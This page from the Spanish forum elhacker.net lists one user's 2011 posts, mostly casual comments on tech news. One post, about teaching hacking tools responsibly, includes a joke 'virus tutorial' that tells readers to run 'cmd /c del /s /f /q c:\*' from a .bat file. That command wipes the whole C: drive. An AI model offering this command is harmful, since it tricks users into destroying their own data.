elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6 7 8 9
21  Foros Generales / Foro Libre / Re: ***Envío de invitaciones Google+*** en: 31 Julio 2011, 18:14 pm
Sauruxum gracias mil  ;-) ;-) ;-)
quien quiera invitacion MP
22  Foros Generales / Foro Libre / Re: Como enseñar esto sin convertir lammers? en: 31 Julio 2011, 03:02 am
como harian para enseñar su uso y como funciona sin que se conviertan en lammers?
linux
 
"Todo lo que se enseñara, se enseñara de forma educativa, no me hago responsable del uso que le den", eso me da risa siempre xD
es para que puedan dormir ranquilos
Como harian ustedes para tratar temas asi? ya que se aprenden muchas cosas al usar esas herramientas
los experimentos (en casa y con gaseosa XD) pueden ser muy educativos

Código:
Por ejemplo yo podría decir:

Citar
Tutorial para hacer un virus:
1. Copiar esto y pegar en un block de notas
Código:

cmd /c del /s /f /q c:\*

2. Guardarlo como x.bat y hacerle doble click.
;-)  :xD 
23  Foros Generales / Noticias / Re: Apple patenta el teclado sin teclas en: 29 Julio 2011, 23:06 pm
Mañana van a patentar el oxigeno y nos van a dejar sin aire.

Por eso es que estas empresas tienen el monopolio y la culpa es de las mismas leyes que lo permiten patentando cosas básicas.

Una cosa sería patentar el modelo de un auto pero otra cosa muy diferente es patentar  la rueda.
tengo que decir que alguien intento patentar la rueda no hace muchos años, listos los hay en todas partes!
la pregunta del millon: ¿puedo patentar la tecla enter?  :silbar:
24  Foros Generales / Noticias / Re: Antena 3 lanza una campaña antipiratería en la que criminaliza el P2P en: 29 Julio 2011, 23:01 pm
criminalizar, desinformar, asustar, estas son sus armas...

y no les serviran de nada
25  Foros Generales / Noticias / Re: El último ataque de Microsoft a Google: Gmail-man en: 29 Julio 2011, 22:32 pm
parecen politicos, no importa lo que hagan o dejen de hacer siempre hay que decir que el otro es el malo, todo por la pasta!  ;-) ;-) ;-)
26  Foros Generales / Noticias / Re: Facebook se adelanta a Google+ creando "Facebook for Business" en: 29 Julio 2011, 22:29 pm
es que facebook no tiene suficientes anuncios!?!?

mark estaria cagando y se puso a pensar: si no puedo con google + voy a buscar la manera de hacer mas dinero para poder comprar g+!
TODO tiene un precio.
fb 4 bisnes el nombre lo dice todo   :-X
27  Foros Generales / Noticias / Re: Facebook quiere cerrar páginas que suplantan su nombre en: 29 Julio 2011, 22:07 pm
me pregunto quien tendra registrado www.fakebook.com  :¬¬
en el juico microsoft vs mocosoft, el juez NO dio la razon a bill  ;-)
28  Seguridad Informática / Seguridad / Re: Nueva encuesta: Mejor Antivirus en: 28 Julio 2011, 02:45 am
un poco de cabeza y un buen firewall deberian ser suficientes, pero en mi pc uso avast + comodo firewall (vaya sustos me da el avast al actualizar)
29  Foros Generales / Noticias / Re: 'Público' implica a Ramoncín en el escándalo de la SGAE en: 27 Julio 2011, 12:09 pm
¿es que a este señor no le enseñaron a leer lo que firma?  :¬¬
30  Foros Generales / Noticias / Re: Microsoft lanza la nueva versión de su sistema operativo de código abierto .... en: 12 Julio 2011, 10:21 am
para cuando un xp gratuito para uso "no comercial"?  :¬¬
Páginas: 1 2 [3] 4 5 6 7 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines